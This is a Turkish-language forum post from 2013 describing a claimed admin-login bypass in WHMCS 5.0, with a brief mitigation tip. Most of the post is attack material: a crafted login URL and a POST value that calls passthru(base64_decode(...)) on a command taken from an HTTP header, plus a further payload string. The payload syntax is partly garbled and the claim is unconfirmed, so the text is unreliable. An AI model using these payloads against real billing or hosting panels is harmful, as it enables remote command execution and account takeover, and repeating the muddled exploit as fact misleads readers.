| |
|
22 Ağustos 2013, 12:12
| #1 | |
| Çevrimdışı  IF Ticaret Sayısı: (0) | whmcs 5.x güvenlik açığı whmcs 5.0 sürümünde bir güvenlik açığı mevcut, ancak 5.1'de önbellek güvenlik eklentisi eklendi. http://site.com/whmcs/admin/login.php?correct&cache=1?login=getpost{} eğer önbellek doğrulama yok ise (5.0 sürümünde eksik) sayfa yüklenmeye çalışacak ve tamper data veya benzeri bir modül ile POST_SESSION değeri aşağıdaki gibi değiştirildiğinde yönetici sayfası açılacaktır. POST: $post(login=1);passthru(base64_decode(\$_SERVER[HTTP_CMD]))&login_cancel;die;"; PAYLOAD: $payload = "login=1&title=1&execorder=0&hook=urlencoded&r edir ect={admin_index}"; şuan için olası çözüm olarak sürüm yükseltilebilir ve admin panel yolu değiştirilebilir, | |
| |  |
| IRCForumlari.NET Reklamlar |
   |
 |
| Etiketler |
| 5x, açığı, güvenlik, whmcs |
| Konuyu Toplam 1 Üye okuyor. (0 Kayıtlı üye ve 1 Misafir) | |
| |
Benzer Konular | ||||
| Konu | Konuyu Başlatan | Forum | Cevaplar | Son Mesaj |
| Yok böyle güvenlik açığı! | Zen | Bilim Dünyasından Son Haberler | 0 | 19 Kasım 2012 14:09 |
| İşlemcide güvenlik açığı! | Dilara | Güvenlik Açıkları | 0 | 23 Mart 2009 13:34 |
| Explorer'da Güvenlik Açığı.. | Dilara | Güvenlik Açıkları | 0 | 26 Aralık 2008 10:50 |
| DNS Güvenlik Açığı | Ocean | Güvenlik Açıkları | 2 | 07 Ağustos 2008 09:30 |
| Güvenlik Açığı MSN'yi Karıştırdı | DoStNaMe | Güvenlik Açıkları | 0 | 09 Haziran 2005 15:10 |
Normal
